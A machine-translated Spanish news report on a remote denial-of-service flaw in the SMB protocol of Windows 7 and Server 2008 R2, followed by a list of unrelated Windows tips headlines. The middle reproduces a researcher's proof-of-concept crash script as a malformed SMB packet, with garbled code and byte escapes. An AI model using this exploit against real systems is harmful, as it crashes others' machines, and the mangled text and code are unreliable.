Microsoft confirmó ayer que hay informes de que hay un vacío legal en Windows 7 y WindowsServer2008R2, se puede utilizar remotamente a los sistemas de ataque y llevar al colapso del núcleo del sistema, Microsoft es en este tema investigación.
El portavoz oficial de Microsoft, dijo que existe esta vulnerabilidad como una negación de archivos de red de Windows y compartir impresoras de protocolo ServerMessageBlock (SMB) de la vulnerabilidad servicio, pero hasta el momento, Microsoft no se ha encontrado para explotar este caso la vulnerabilidad comportamiento de ataque.
expertos en seguridad LaurentGaffie ayer la exposición en un blog de esta vulnerabilidad y otras vulnerabilidades clasificado como de clase alta, LaurentGaffie indica que esta vulnerabilidad hará que el protocolo SMB para entrar en un bucle infinito, que también llevó a cabo un código completo demuestra. Actualmente no hay parches para corregir esta vulnerabilidad, y Gaffie recomienda que los usuarios desactiven las funciones y puertos SMB antes de que Microsoft lance el parche.
Gaffie señaló que no importa cómo esté configurado su firewall, los piratas informáticos pueden atacar su sistema en la LAN o usar IE. Gaffié dijo que la vulnerabilidad sólo afecta a Windows 7 y WindowsServer2008R2, no afecta a otros sistemas.
código adjunto demuestra:
# win7-crash.py:
#Trigger un accidente de núcleo remoto en Win7 andserver2008R2 (InfiniteLoop)
#Crash inKeAccumulateTicks .
() duetoNT_ASSERT () /DbgRaiseAssertionFailure () causó byan # InfiniteLoop
#NO BSOD, tienes que tirar del enchufe
# Para activar de forma rápida, desde thetarget :. \\ this_t_ip_addrBLAH, chocar al instante
#Author: Laurent Gaffié
#
SocketServer importación
paquete = x00x00x00x9a # > longitud shouldbe9enot9a ..
xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00
x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41
xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00
x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01
xcbx51xe0x19x62x60xcax01x80x00x 1ex00x20x4cx4dx20
x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e
x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a
1. Presione la tecla de método abreviado win + r, abra el cuadro de diálogo de ejecución. Figura 1
Situación: Recientemente, la computadora de un compañero inst
En nuestro uso diario de la computadora, ocasionalmente habrá problemas con la pantalla azul. Cada v
Los certificados de seguridad se utilizan a menudo cuando exploramos algunos sitios web especiales.
Cómo acelerar win7 o mantener su efecto Aero
¿Cómo convierte el sistema win7 el formato de disco GPT al formato de partición MBR
Windows 7 Aero Shake: Agitar la ventana se ha ido
Introducción al "Modo Dios" en Windows 7
Cómo configurar la aceleración de hardware de gráficos en el sistema Windows 7
El ensayo encontró que - al igual que cuatro razones para Windows 7
Sistema Win7 cómo limpiar la basura del registro
Solución para eliminar por error el proyecto de escritorio de Win7
Deje que el icono de MSN ingrese al área de notificación de Windows 7
Desactivar Windows 7 Edge Auto Maximize
¿Qué sucede si el clic del mouse en el escritorio remoto QQ no es exacto en Win7?
Comparación definitiva de la serie de seis versiones de Windows 7
8 razones por las que no tiene que actualizar Windows 7 SP1
Manipule fácilmente la copia masiva de diferentes archivos de directorio.
Cómo cerrar el servicio inactivo en Win7 Cómo desactivar el servicio inactivo Win7
2011 el disco duro del sector de gran capacidad acelera la desaparición de WinXP
una activación de producto de Windows 7 RC clave
Resumen del método de arranque rápido del sistema Win8
Cómo iniciar el modo Dios en el sistema win7
¿Cómo cambiar el cuadro de notificación de Win10 a Win7 "globo"?